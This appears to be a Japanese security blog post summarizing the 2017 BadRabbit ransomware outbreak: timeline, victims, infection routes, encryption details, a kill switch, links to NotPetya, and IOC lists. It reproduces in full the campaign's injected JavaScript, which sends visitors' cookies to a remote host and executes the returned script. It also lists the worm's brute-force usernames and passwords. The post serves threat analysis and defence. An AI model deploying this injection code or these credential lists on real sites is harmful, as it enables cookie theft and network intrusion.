ブログトップ 記事一覧 ログイン 無料ブログ開設

piyolog RSSフィード

2017-10-25

ランサムウェアBadRabbitに関する情報についてまとめてみた

| 17:58 |  ランサムウェアBadRabbitに関する情報についてまとめてみたを含むブックマーク

2017年10月24日夜(日本時間)からウクライナロシアを中心にランサムウェア「BadRabbit」に感染し、被害を受けたとの情報が出回っています。ここではBadRabbitに関連する情報についてまとめます。

タイムライン

日時出来事
2016年9月8日一連のキャンペーンに関連するとみられる通信先でRiskIQにより最初に観測された日。
2017年2月頃FireEyeが攻撃にも利用されたJavaScriptフレームワークを観測。*1
2017年10月6日アイカ工業サーバー不正アクセスを受ける。
〃 17時2分アイカ工業Webサイト改ざんされる。
2017年10月9日アイカ工業サーバー不正アクセスを受ける。
2017年10月24日 17時頃BadRabbitの拡散が始まる。
〃 21時26分InterfaxTwitterを通じてWebサイト障害が発生していると報告。*2
〃 23時37分この日時までアイカ工業Webサイトがされていた。
〃 24時頃BadRabbitの拡散を行っていたWebサイトが停止する。
ウクライナのCERT-UAがさらなる攻撃の可能性があるとして注意喚起。*3
US-CERTがBadRabbitによる感染報告を複数受けているとして情報公開*4
2017年10月25日 1時ウクライナ保安庁が同国内で確認されたインシデントに対する情報提供、及び注意喚起。*5
海外のセキュリティソフト会社よりアイカ工業Webサイトサイバー攻撃悪用の疑いがあると情報発信。*6
〃 12時17分アイカ工業は同社Webサイトを一時閉鎖。
2017年10月26日 8時45分アイカ工業Webサイトへ攻撃の疑いがあると発表。
〃 15時30分アイカ工業Webサイトが一時的に改ざんされた痕跡を確認と発表。
〃 17時頃IPAがBadRabbitに対して注意喚起。*7
〃 22時20分Cisco(Talos)がBadRabbitの拡散機能にEternalRomanceが利用されていると指摘。
2017年11月2日 19時10分アイカ工業が続報としてWebサイト改ざんされていた可能性がある期間を発表。
2017年11月20日 9時アイカ工業Webサイトを再開。最終報を発表。

被害状況

BadRabbitの影響を受けたとみられる具体名が出ている組織
組織名被害・影響の概要
インタファクス通信ロシアWebサイトなどの一部のサービスに障害発生。
フォンタンカ出版ロシアサーバーが攻撃を受け障害発生。*8
オデッサ国際空港ウクライナ職員旅客データを手入力による対応に変更となった。
これを受け当該空港を利用する数便に遅れが生じた。
キエフ地下鉄ウクライナ決済システムで障害が発生した。列車運行への影響はなかった。
セキュリティ組織の把握状況
セキュリティ組織把握している被害状況
NCSCBadRabbitの影響を受けた報告は一切受けていない。*9
IPA多くの機関において業務に支障が出るなどの深刻な影響が発生している。
ESET被害の半分以上はロシアで発生。
観測された割合はロシア65%、ウクライナ12.2%、ブルガリア10.2%、トルコ6.4%、日本3.8%、その他2.4%
KasperskyKSNの統計では全体として約200の端末で攻撃を確認。
大半はロシア。この他にウクライナトルコドイツ等でも確認している。
TrendMicroSPNの統計では日本国内での検出は確認されていない。
改ざんされたサイトはデンマークアイルランドトルコロシアで確認。
25日17時半時点でロシア110台、カザフスタン3台、ウクライナ1台の計114台をブロックした。
Symantec感染試行の検出の大半はロシアで最初に現れてから2時間後に発生。
感染試行の国別の検出状況はロシア86%、日本3%、ブルガリア2%、ウクライナ1%、アメリカ1%、その他7%
Avast15か国のユーザーでBadRabbitを検出
それぞれの検出率はロシアが71%、ウクライナ14%、ブルガリア8%。
ポーランド、US、ルーマニアなどでも検出しているが1%以下。
日本国内の状況

ランサムウェア「BadRabbit」について

感染デモ動画
BadRabbitと呼ばれる由来

  • 支払いに関する情報が掲載されたWebサイト「BadRabbit」と掲載されていたことから。
  • これ以外にも次の呼称が用いられる場合がある。
感染経路(1):改ざんされたサイトの閲覧による感染
感染経路(2):BadRabbitの拡散機能による感染

認証試行に用いられるユーザーID文字列

Administrator,Admin,Guest,User,User1,user-1Test,root,buh,boss,ftp,rdp,rdpuser,rdpadmin,manager,

support,work,other user,operator,backup,asus,ftpuser,ftpadmin,nas,nasuser,nasadmin,superuser,netguest,alex

認証試行に用いられるパスワード文字列

Administrator,administrator,Guest,guest,User,user,Admin,adminTest,test,root,123,1234,12345,123456,1234567,

12345678,123456789,1234567890,Administrator123,administrator123,Guest123,guest123,User123,user123,Admin123,

admin123Test123,test123,password,111111,55555,77777,777,qwe,qwe123,qwe321,qwer,qwert,qwerty,qwerty123,zxc,

zxc123,zxc321,zxcv,uiop,123321,321,love,secret,sex,god

BadRabbitの暗号化機能
  • AES-128bitで暗号化される。
  • AES-128bitの暗号化鍵はRSA-2048bit公開鍵により暗号化される。
  • 暗号化されたファイルの終端に「ecrypted」と追加する。

暗号化される対象の拡張子

.3ds .7z .accdb .ai .asm .asp .aspx .avhd .back .bak .bmp .brw .c .cab .cc .cer .cfg .conf .cpp .crt .cs .ctl .cxx .dbf .der .dib .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .hpp .hxx .iso .java .jfif .jpe .jpeg .jpg .js .kdbx .key .mail .mdb .msg .nrg .odc .odf .odg .odi .odm .odp .ods .odt .ora .ost .ova .ovf .p12 .p7b .p7c .pdf .pem .pfx .php .pmf .png .ppt .pptx .ps1 .pst .pvi .py .pyc .pyw .qcow .qcow2 .rar .rb .rtf .scm .sln .sql .tar .tib .tif .tiff .vb .vbox .vbs .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vmx .vsdx .vsv .work .xls .xlsx .xml .xvd .zip

組み込まれたRSA-2048の公開鍵

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB

この他に実装されている機能など

ジョブ名などに登場する文字列

ジョブ名等の文字列Game Of Thronesでの役割ジョブの動き
rhaegalRhaegar Targaryen王子にちなんで名づけられた。3匹のドラゴンの1つ。dispci.exeとdrogon.jobを実行する。
dorogonKhal Drogoにちなんで名づけられた。3匹のドラゴンの1つ。PCをシャットダウンし、暗号化を実行。身代金文書を表示する。
viserion
(viserion_)
Night Kingが殺されワイトとして復活したドラゴン。3匹のドラゴンの1つ。2度目の再起動時に実行。スクリーンロックし、身代金要求画面を表示。
GrayWormKasperskyによれば登場人物との紹介されているが、同名の人物は存在しないとみられる。
似た名前として同作に登場する司令官Grey Wormが存在する。
BadRabbitのキルスイッチ
  • 次の2つのファイルをあらかじめ生成し、ファイルから全ての権限を削除しておくことでBadRabbitの感染プロセスが停止する。*17

c:\windows\infpub.dat

C:\Windows\cscc.dat

過去観測されたランサムウェアとの関連性分析

コメント元対象のランサムウェア関連の有無見解
Group-IBNotPetya肯定NotPetyaを修正したものと解析している。
ESETPetya肯定Petya(Penza)の変種と解析している。
KasperskyNotPetya肯定コードの一部の一致、ドメインのリストが同一、拡散方法が類似等から背後にいる関係者は同じとの見方。
IntezerLabsNotPetya否定?同社リサーチャーはコードの類似率は13%であると分析。*18
PwCNotPetya肯定同社脅威アナリストはNotPetyaとBadRabbitの表層的な差異分析をした結果、両者に密接な関連がみられる*19
BitdefenderGoldenEye/NotPetya肯定構造的に、そしてより広い焦点からも極めて似ている。
Cisco(Talos)NotPetya(Nyetya)肯定BadRabbitとNyetyaのコアコードは同じベース上に構築されている。
マルウェアビルドツールチェーンは非常に似ている。
絶対的なつながりを示す証拠はないが両マルウェアの作成者は同じであるといった確信を持っている。
@Adam_CyberNotPetya肯定DLLを共有かつ67%が同一のコードベースである。
これら攻撃は同じスレットアクターが背後にいる可能性。*20

改ざんされた恐れのあるサイト一覧にアイカ工業ドメイン名が含まれる

経緯
改ざんの状況

BadRabbit関連情報(IOC情報)

ファイル
ファイル名機能Sha256
install_flash_player.exe
FlashUtil.exe
ドロッパー630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
infpub.datdispci.exeの起動タスクを作成。
RSA暗号を利用して対象ファイルを暗号化。
579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648
141d45d650580ed4b0d0fc4b8fd5448da67b30afbe07781da02c39d345a8f4a0
dispci.exe別のブートローダーをインストール
マシンを起動不可とする。
8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93
cscc.dat32ビット版のDiskCryptor用ドライバ682ADCB55FE4649F7B22505A54A9DBC454B4090FC2BB84AF7DB5B0908F3B7806
64ビット版のDiskCryptor用ドライバ0b2f863f4119dc88a22cc97c0a136c88a0127cb026751303b045f7322a8972f6
Mimikatz32ビット版のmimikatz 亜種2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035
64ビット版のmimikatz 亜種301b905eb98d8d6bb559c04bbda26628a942b2c4107c07a02e8f753bdcfe347c
BadRabbit関連の通信
種別通信
埋め込まれていた通信先(1)185.149.120[.]3
埋め込まれていた通信先(2)172.97.69[.]79 (dfkiueswbgfreiwfsd[.]tk)
埋め込まれていた通信先(3)91.236.116[.]50
埋め込まれていた通信先(4)38.84.134[.]15
ドロッパー配布元1dnscontrol[.]com/flash_install.php (5[.]61[.]37[.]209)
ペイメント先caforssztxqzf2nm[.]onion
同じキャンペーンで利用の恐れがある通信先(ESET)webcheck01[.]net
webdefense1[.]net
secure-check[.]host
firewebmail[.]com
secureinbox[.]email
secure-dns1[.]net
改ざんされていた恐れのあるWebサイト
  • 埋め込まれていた通信先(1) 185.149.120[.]3

aica[.]co[.]jp

www[.]dermavieskin[.]com

grupovo[.]bg

www[.]fitnes-trener[.]com[.]ua

www[.]afaceri-poligrafice[.]ro

grandua[.]ua

i24[.]com[.]ua

scanstockphoto[.]com

izgodni[.]bg

www[.]biotechusa[.]ru

www[.]mediaport[.]ua

www[.]armoniacenter[.]com

sweet-home[.]dn[.]ua

  • 埋め込まれていた通信先(2) 172.97.69[.]79

www[.]chnu[.]edu[.]ua

fitnes-trener[.]com[.]ua

www[.]t[.]ks[.]ua

www[.]fastfwd[.]ru

www[.]uscc[.]ua

bitte[.]net[.]ua

www[.]fitnes-trener[.]com[.]ua

ophthalmolog[.]kiev[.]ua

grandua[.]ua

i24[.]com[.]ua

akvadom[.]kiev[.]ua

ulianarudich[.]com[.]ua

football[.]zp[.]ua

www[.]mediaport[.]ua

chnu[.]edu[.]ua

evroremont[.]kharkov[.]ua

thecovershop[.]pl

www[.]tofisa[.]com

cream-dream[.]com[.]ua

go2odessa[.]ru

bahmut[.]com[.]ua

  • 埋め込まれていた通信先(3) 91.236.116[.]50

abantyoreselurunler[.]com

aldingareefretreat[.]com

ftp9[.]net

magicofis[.]com

piiz[.]tk

tedizmir[.]k12[.]tr

websgramly[.]com

www[.]andronova[.]net

www[.]detaymaxinet[.]com

www[.]fikracenneti[.]com

www[.]gulenturizm[.]com[.]tr

www[.]ilgihastanesi[.]com

www[.]komedibahane[.]com

www[.]moonlightcinemaclub[.]com

www[.]musterihizmetlerinumarasi[.]com

www[.]techkafa[.]net

www[.]teknolojihaber[.]net

www[.]vertizontal[.]ro

  • 埋め込まれていた通信先(4) 38.84.134[.]15

izgodni[.]bg

montenegro-today[.]com

scanstockphoto[.]com

www[.]grupovo[.]bg

www[.]matasedita[.]sk

www[.]montenegro-today[.]com

www[.]myk104[.]com

www[.]nadupanyfanusik[.]sk

www[.]otbrana[.]com

www[.]sinematurk[.]com

www[.]ucarsoft[.]com

ペイメント先 Bitcoin ウォレット (公開されているもの)
キャンペーンに利用されたJavaScript
var REMOTE_URL = ‘<INJECTION HOST URL>’;
var C_TIMEOUT = 20000;
function analyze_traffic() {
   return {
       ‘Tr.Referer’: document.referrer,
       ‘Tr.Agent’: navigator.userAgent,
       ‘Tr.CookieState’: !!document.cookie,
       ‘Tr.Cookie’: document.cookie,
       ‘Tr.Domen’: window.location.hostname
   };
}

function execute_request(post, url, callback) {
   var xhr = init_xhr();
   if (!!xhr) {
       xhr.open(‘POST’, url);
       xhr.timeout = C_TIMEOUT;
       xhr.setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
       xhr.onreadystatechange = function () {
           if (xhr.readyState == 4 && xhr.status == 200) {
               callback(xhr.responseText);
           }
       };
       var content = build_query(post);
       xhr.send(content);
   }
}

function apply_payload(response) {
   if (response) {
       var json_result = JSON.parse(response);
       if (json_result) {
           var inject_string = urldecode(json_result.InjectionString);
           if (json_result.InjectionType === 1) {
               window.location = inject_string;
           } else {
               write_on_page(inject_string);
           }
       }
   }
}

function write_on_page(content) {
   var div = document.createElement(‘div’);
   div.id = ‘response’;
   div.innerHTML = content;
   document.body.appendChild(div);
   var scripts = div.getElementsByTagName(‘script’);
   if (scripts.length > 0) {
       for (var i = 0; i < scripts.length; i++) {
           var script = document.createElement(‘script’);
           script.innerHTML = scripts[i].innerHTML;
           document.body.appendChild(script);
           scripts[i].parentNode.removeChild(scripts[i]);
       }
   }
}

function build_query(post) {
   var post_query = [];
   for (var k in post) {
       if (post.hasOwnProperty(k)) {
           post_query.push(k + ‘=’ + post[k]);
       }
   }
   return post_query.join(‘&’);
}

function init_xhr() {
   if (!!window.XMLHttpRequest) {
       return new XMLHttpRequest();
   } else if (!!window.ActiveXObject) {
       var xhr_array = [
           ‘Msxml2.XMLHTTP.6.0’,
           ‘Msxml2.XMLHTTP.3.0’,
           ‘Msxml2.XMLHTTP’,
           ‘Microsoft.XMLHTTP’
       ];
       for (var i = 0; i < xhr_array.length; i++) {
           try {
               return new ActiveXObject(xhr_array[i]);
           }
           catch (e) {
           }
       }
   }
}

function urldecode(data) {
   return decodeURIComponent(data).replace(/\+/g, ‘%20’);
}

// Execute request
var traffic = analyze_traffic();
execute_request(traffic, REMOTE_URL, apply_payload);

参考情報(報道、解析、まとめ等)

全国紙ブロック紙
報道日付新聞社記事名
2017年10月25日朝刊日本経済新聞地下鉄や空港にサイバー攻撃
2017年10月25日夕刊毎日新聞大規模サイバー攻撃 身代金ウイルス 日露欧に被害 (共同)
2017年10月25日夕刊東京新聞ロシアや日本などに大規模サイバー攻撃 身代金ウイルス感染 (共同)
2017年10月26日朝刊産経新聞日本や露にサイバー攻撃 ウクライナ 空港・地下鉄被害
セキュリティ組織
その他

更新履歴

*1国内でも「Bad Rabbit」を観測 - 2月には誘導スクリプトが稼働か,Security NEXT,2017年10月25日アクセス

*2https://twitter.com/interfax_news/status/922799045088829442

*3Кібератака 24.10.2017

*4Multiple Ransomware Infections Reported

*5СБУ блокувала подальше розповсюдження комп’ютерного вірусу

*6アイカ工業にサイバー攻撃 サイト停止、不正改ざんの疑い,共同通信,2017年10月26日アクセス

*7https://twitter.com/IPAjp/status/923464685340340224

*8:Вирус-шифровальщик атаковал российские СМИ,Ведомости,2017年10月26日アクセス

*9Bad Rabbit: Game of Thrones-referencing ransomware hits Europe,thegurdian,2017年10月26日アクセス

*10ロシアなど複数国でサイバー攻撃、大きな障害なし,TBS,2017年10月25日アクセス

*11ロシアなどに新たなサイバー攻撃、日本でも被害,Reuters,2017年10月25日アクセス

*12https://twitter.com/bartblaze/status/922866774693044224

*13https://twitter.com/MaartenVDantzig/status/922854232176422912

*14https://twitter.com/LukasStefanko/status/922916146856189952

*15https://twitter.com/fwosar/status/922866144549228545

*16https://twitter.com/0xAmit/status/922871446602502145

*17https://twitter.com/0xAmit/status/922872657116368897

*18https://twitter.com/jaytezer/status/922875751174758400

*19個人ブログにて指摘

*20https://twitter.com/Adam_Cyber/status/922930877109362694

*21アイカ工業がWebサイトを一時閉鎖、Bad Rabbitが原因か,ITpro,2017年10月26日アクセス

*22不正アクセス アイカ工業サイトに改ざんの痕跡 HP停止,毎日新聞,2017年10月27日アクセス

*23アイカ工業、サイバー攻撃の疑いで閉鎖中だったWebサイトを再開,ITPro,2017年11月21日アクセス